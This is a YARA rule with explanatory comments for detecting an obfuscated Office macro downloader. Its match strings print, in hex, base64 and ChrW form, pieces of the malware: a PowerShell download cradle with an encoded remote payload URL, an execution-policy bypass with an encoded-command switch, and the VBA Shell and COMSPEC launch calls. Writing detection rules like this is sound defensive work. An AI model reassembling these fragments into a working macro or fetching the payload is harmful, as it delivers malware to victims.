
// Detects an obfuscated Office macro (O97M) downloader. The indicators below cover
// three pieces of the macro: a PowerShell command line assembled with ChrW()
// concatenation (so the text never appears literally in the VBA source), a
// base64/UTF-16LE-encoded PowerShell download cradle, and the VBA.Shell /
// COMSPEC calls presumably used to launch it. All six indicators must match.
rule TrojanDownloader_O97M_Obfuse_PJ_MTB{
meta:
// Carried over from the Defender signature: detection name, signature type, and
// the raw signature header bytes. Those bytes presumably encode the threshold
// and weights (6 strings, weight 1 each, threshold 6), which is what the
// condition below reproduces - confirm against the converter if they disagree.
description = "TrojanDownloader:O97M/Obfuse.PJ!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "
strings :
// Base64 text of a UTF-16LE string (shown decoded-from-hex in the trailing
// comment). The base64 itself decodes to the start of a classic download
// cradle: IEX ((new-object net.webclient).downloadstring('http
$a_00_0 = {53 51 42 46 41 46 67 41 49 41 41 6f 41 43 67 41 62 67 42 6c 41 48 63 41 4c 51 42 76 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 47 34 41 5a 51 42 30 41 43 34 41 64 77 42 6c 41 47 49 41 59 77 42 73 41 47 6b 41 5a 51 42 75 41 48 51 41 4b 51 41 75 41 47 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 7a 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 63 41 61 41 42 30 41 48 51 41 63 } //1 SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAc
// Continuation of the same encoded command: the rest of the URL (scheme
// separator, host:port and path of the remote payload) followed by the closing
// ')) '. Together with $a_00_0 this is presumably the value passed to the
// "-e" (EncodedCommand) switch matched by $a_00_3.
$a_00_1 = {41 41 36 41 43 38 41 4c 77 41 32 41 44 6b 41 4c 67 41 30 41 44 55 41 4c 67 41 78 41 44 6b 41 4c 67 41 79 41 44 55 41 4e 41 41 36 41 44 67 41 4d 41 41 34 41 44 41 41 4c 77 42 4f 41 48 49 41 62 67 41 7a 41 45 63 41 52 41 42 71 41 44 67 41 4f 51 42 30 41 44 55 41 4c 77 42 53 41 48 55 41 62 67 42 4e 41 47 55 41 5a 41 42 70 41 47 45 41 4c 67 42 30 41 48 67 41 64 41 41 6e 41 43 6b 41 4b 51 41 67 41 41 3d 3d } //1 AA6AC8ALwA2ADkALgA0ADUALgAxADkALgAyADUANAA6ADgAMAA4ADAALwBOAHIAbgAzAEcARABqADgAOQB0ADUALwBSAHUAbgBNAGUAZABpAGEALgB0AHgAdAAnACkAKQAgAA==
// ChrW() concatenation that evaluates to "powershell.exe"
// (112 'p', 111 'o', 119 'w', 101 'e', 114 'r', 115 's', 104 'h', 101 'e',
// 108 'l', 108 'l', 46 '.', 101 'e', 120 'x', 101 'e').
$a_00_2 = {43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 31 31 31 29 20 26 20 43 68 72 57 28 31 31 39 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 31 34 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 31 30 34 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 30 38 29 20 26 20 43 68 72 57 28 31 30 38 29 20 26 20 43 68 72 57 28 34 36 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 32 30 29 20 26 20 43 68 72 57 28 31 30 31 29 } //1 ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
// ChrW() concatenation that evaluates to " -ep bypass -e ": the execution-policy
// bypass switch plus the encoded-command switch that takes the base64 payload.
$a_00_3 = {26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 34 35 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 39 38 29 20 26 20 43 68 72 57 28 31 32 31 29 20 26 20 43 68 72 57 28 31 31 32 29 20 26 20 43 68 72 57 28 39 37 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 31 31 35 29 20 26 20 43 68 72 57 28 33 32 29 20 26 20 43 68 72 57 28 34 35 29 20 26 20 43 68 72 57 28 31 30 31 29 20 26 20 43 68 72 57 28 33 32 29 } //1 & ChrW(32) & ChrW(45) & ChrW(101) & ChrW(112) & ChrW(32) & ChrW(98) & ChrW(121) & ChrW(112) & ChrW(97) & ChrW(115) & ChrW(115) & ChrW(32) & ChrW(45) & ChrW(101) & ChrW(32)
// VBA.Shell call - presumably how the assembled command line is executed.
$a_00_4 = {56 42 41 2e 53 68 65 6c 6c 20 28 } //1 VBA.Shell (
// Reads the COMSPEC environment variable (path of the command interpreter);
// presumably used as the host process that spawns PowerShell.
$a_00_5 = {56 42 41 2e 45 6e 76 69 72 6f 6e 24 28 22 43 4f 4d 53 50 45 43 22 29 } //1 VBA.Environ$("COMSPEC")
condition:
// Each term is (match count & 1) * weight; with six weight-1 terms the sum only
// reaches 6 when every term is 1, i.e. every string is present.
// NOTE(review): "& 1" tests the low bit of the match count rather than "> 0", so
// a string occurring an even number of times (e.g. twice in one document)
// contributes 0 and the rule would not fire. If "present at least once" is the
// intent, "all of them" (or "#x > 0" per string) would express it; confirm
// against the signature converter before changing.
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1) >=6
}